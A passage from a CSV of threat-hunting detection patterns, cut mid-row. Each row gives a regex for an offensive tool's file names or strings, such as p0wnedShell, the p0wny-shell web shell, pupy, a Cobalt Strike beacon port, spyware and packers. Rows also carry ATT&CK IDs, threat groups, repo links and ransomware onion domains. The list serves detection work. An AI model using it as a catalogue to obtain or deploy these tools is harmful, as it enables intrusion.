It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54303" "*p0wnedHostUserInterface.cs*",".{0,1000}p0wnedHostUserInterface\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. 
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54304" "*p0wnedHostUtilities.cs*",".{0,1000}p0wnedHostUtilities\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54305" "*p0wnedInveigh.cs*",".{0,1000}p0wnedInveigh\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). 
and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54306" "*P0wnedListener.Exe*",".{0,1000}P0wnedListener\.Exe.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54307" "*p0wnedListenerConsole.cs*",".{0,1000}p0wnedListenerConsole\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” 
Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54308" "*p0wnedMasq.cs*",".{0,1000}p0wnedMasq\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54309" "*p0wnedMeter.cs*",".{0,1000}p0wnedMeter\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” 
Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54310" "*p0wnedMeter.Menu*",".{0,1000}p0wnedMeter\.Menu.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54311" "*p0wnedMov.cs*",".{0,1000}p0wnedMov\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” 
Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54312" "*p0wnedPELoader.cs*",".{0,1000}p0wnedPELoader\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54313" "*p0wnedPotato.cs*",".{0,1000}p0wnedPotato\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. 
What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54314" "*p0wnedPowerCat.cs*",".{0,1000}p0wnedPowerCat\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an “all in one” Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54315" "*p0wnedPPID.cs*",".{0,1000}p0wnedPPID\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. 
What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54316" "*p0wnedRawUserInterface.cs*",".{0,1000}p0wnedRawUserInterface\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54317" "*p0wnedResources.cs*",".{0,1000}p0wnedResources\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET).
It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54318" "*p0wnedRoast.cs*",".{0,1000}p0wnedRoast\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54319" "*p0wnedShell*",".{0,1000}p0wnedShell.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET).
It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54320" "*p0wnedShell.cs*",".{0,1000}p0wnedShell\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included.
You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54321" "*p0wnedShellx64.exe*",".{0,1000}p0wnedShellx64\.exe.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54322" "*p0wnedShellx86.exe*",".{0,1000}p0wnedShellx86\.exe.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off).
and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54323" "*p0wnedSystem.cs*",".{0,1000}p0wnedSystem\.cs.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","N/A","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","54324" "*p0wny-shell*",".{0,1000}p0wny\-shell.{0,1000}","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application.
Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","N/A","10","2362","659","2024-05-16T10:22:11Z","2016-11-09T20:41:01Z","54325" "*p27dokhpz2n7nvgr.14udep.top*",".{0,1000}p27dokhpz2n7nvgr\.14udep\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54326" "*p27dokhpz2n7nvgr.1aweql.top*",".{0,1000}p27dokhpz2n7nvgr\.1aweql\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54327" "*p27dokhpz2n7nvgr.1axzcw.top*",".{0,1000}p27dokhpz2n7nvgr\.1axzcw\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54328" "*p27dokhpz2n7nvgr.1hw36d.top*",".{0,1000}p27dokhpz2n7nvgr\.1hw36d\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54329" "*p27dokhpz2n7nvgr.1jemdr.top*",".{0,1000}p27dokhpz2n7nvgr\.1jemdr\.top.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54330" "*p27dokhpz2n7nvgr.onion*",".{0,1000}p27dokhpz2n7nvgr\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54331" "*p3nt4/Invoke-SocksProxy*",".{0,1000}p3nt4\/Invoke\-SocksProxy.{0,1000}","offensive_tool_keyword","Invoke-SocksProxy","also known as PortStarter is a socks proxy and reverse socks server using powershell","T1090 - T1059.001 - T1102.003","TA0011 - TA0010 - TA0005 - TA0003","PortStarter","Vice Society - Conti","C2","https://github.com/p3nt4/Invoke-SocksProxy","1","1","N/A","N/A","10","10","788","169","2021-03-21T21:00:40Z","2017-11-09T06:20:40Z","54332" "*p3nt4/Nuages*",".{0,1000}p3nt4\/Nuages.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","54333" "*p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd.onion*",".{0,1000}p5quu5ujzzswxv4nxyuhgg3fjj2vy2a3zmtcowalkip2temdfadanlyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","54334" "*P8CuaPrgwBjunvZxJcgq*",".{0,1000}P8CuaPrgwBjunvZxJcgq.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through 
managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","54335" "*pac2.localhost:9999*",".{0,1000}pac2\.localhost\:9999.{0,1000}","offensive_tool_keyword","pac2","PAC2 is a framework that generates arbitrary flows and sends and executes them on the Power Automate Platform - using Power automate as a C2","T1550.001 - T1204.002 - T1102 - T1071.001","TA0005 - TA0008 - TA0010- TA0011","N/A","N/A","C2","https://github.com/NTT-Security-Japan/pac2","1","1","N/A","N/A","6","10","6","1","2024-04-16T11:58:54Z","2024-03-01T08:06:32Z","54336" "*pack_py_payload*",".{0,1000}pack_py_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","54337" "*package com.blackh4t*",".{0,1000}package\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - 
T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","54338" "*package externc2*",".{0,1000}package\sexternc2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","54339" "*package kidlogger*",".{0,1000}package\skidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","54340" "*package saint.keylogger*",".{0,1000}package\ssaint\.keylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","54341" "*package saint.webcam*",".{0,1000}package\ssaint\.webcam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","54342" "*package_cvs_into_lse.sh*",".{0,1000}package_cvs_into_lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","54343" 
"*package=impacket*",".{0,1000}package\=impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","54344" "*packer.exe *.exe *.exe*",".{0,1000}packer\.exe\s.{0,1000}\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","54348" "*packers/invobf.py*",".{0,1000}packers\/invobf\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","54349" 
